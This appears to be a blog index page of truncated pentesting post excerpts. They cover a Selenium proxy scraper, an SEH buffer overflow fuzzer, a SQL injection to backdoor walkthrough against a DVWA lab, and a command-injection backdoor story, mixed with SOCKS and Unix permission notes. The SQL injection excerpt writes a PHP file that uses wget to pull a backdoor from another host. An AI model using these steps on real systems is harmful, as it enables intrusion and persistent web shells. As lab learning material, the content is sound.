Posts

Grabbing Proxy With Selenium and Python

Selenium is an automated browser that can be controlled by a script. Selenium supports many programming languages, such as Java, C#, Python, Ruby, PHP, Perl, and JavaScript. This simple script for grabbing a proxy list from the freeproxylist.net website was created with Python.

1. Install Python Selenium

    # apt-get install python-pip
    # pip install selenium

2. Download a browser driver

    Chrome : https://sites.google.com/a/chromium.org/chromedriver/downloads
    Edge : https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/
    Firefox : https://github.com/mozilla/geckodriver/releases
    Safari : https://webkit.org/blog/6900/webdriver-support-in-safari-10/

    Choose the browser you prefer.

3. Run this script

    import os
    from selenium import webdriver
    from bs4 import BeautifulSoup
    from selenium.webdriver.common.keys import Keys

    chromedriver = "./chromedriver"  # replace with your browser driver
    os.environ["webdriver.chrome.driver"] = chromed

SEH Based Buffer Overflow

This time I will tell you about a buffer overflow that occurs in the File Sharing Wizard application; this is the first time I have learned about buffer overflows. We get a buffer overflow when we send 2000 bytes of data to that application. This is the sample fuzzer in Python:

    import socket
    import sys

    ips = '192.168.56.101'
    port = 80
    string = "A" * 2000

    print "[!] Launching Remote BoF on", ips, ", hang on tight!"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connect = s.connect((ips, port))
    except:
        print "[-] Oops! Cannot establish connection..\r\n"
        sys.exit(1)
    print "[*] Sending evil payload..\r\n"
    print "[*] Done! Check your debugger.."
    payload = ('HEAD %s HTTP/1.0\r\n'
               '\r\n') % (string)
    s.send(payload)
    s.close()

With that fuzzer the application will crash, but EIP is not overwritten because this application is protected with SEH; we can see that in the SEH chain menu of the debugger: A

Create Backdoor From Sql Injection

To create a backdoor from SQL injection, the web application must be vulnerable to SQL injection. Then we find the password for the MySQL database, which can be done with some technique, like social engineering or scanning with sqlmap, for example:

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password

After we get the password, we log in to MySQL with the following syntax:

    root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p

then press Enter and input the password we got. Now we are on the MySQL shell, and from here we can create a database and create a backdoor. This is the sample syntax to download a backdoor from another web server:

    mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
    Query OK, 1 row affected (0.00 sec)

Now we

sock proxy

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded.

Comparison with HTTP proxying

SOCKS operates at a lower level than HTTP proxying: SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make and may be used for any form of TCP or UDP socket connection, whereas an HTTP proxy takes an HTTP request and forwards it to an HTTP server. Though HTTP proxying has a different use case in mind, the CONNECT method allows one to forward TCP connections; there is, however, no mechanism for UDP proxying.

Server Exploit (local exploit)

This time I will write about exploiting servers. The exploit I did was over the web, and the web application had a vulnerability. I did the following steps:

First, I did a scan of the web application to find out what applications are used, and I found the site was using WordPress and the XAMPP server application; since both use the latest version, I did not get a vulnerability there.

Second, I found that there is a vulnerability in the gadgets used, and I found a gadget vulnerable in the function that pings an IP; after my tests I found that I could run a variety of commands through it.

Third, I wrote a command that serves to download a backdoor that I had prepared, and my backdoor was successfully placed on the web server.

Fourth, after the backdoor was embedded, it was time to find the location of the embedded backdoor; it is not hard to do because we can use the command execution vulnerability to look for it. After finding it, I opened the backdoor. until

Filesystem permissions

Most current file systems have methods of administering permissions or access rights to specific users and groups of users. These systems control the ability of the affected users to view or make changes to the contents of the filesystem.

Traditional Unix permissions

Permissions on Unix-like systems are managed in three distinct classes. These classes are known as user, group, and others. In effect, Unix permissions are a simplified form of access control lists (ACLs). When a new file is created on a Unix-like system, its permissions are determined from the umask of the process that created it.

Classes

Files and directories are owned by a user. The owner determines the file's owner class. Distinct permissions apply to the owner. Files and directories are assigned a group, which defines the file's group class. Distinct permissions apply to members of the file's group. The owner doesn't need to be a member of the file's group. Users who are not the

Building and Exploiting System

In this case I learn to build a system and